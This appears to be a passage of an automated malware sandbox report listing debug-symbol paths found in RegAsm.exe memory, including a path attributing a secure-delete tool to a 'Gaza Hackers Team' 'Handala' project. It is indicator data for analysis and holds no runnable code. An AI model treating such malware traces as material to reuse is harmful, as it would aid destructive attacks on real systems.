        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q]C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q|C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qKC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qLC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q}C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qxC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdbt source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qXC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qGC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qvC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qwC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
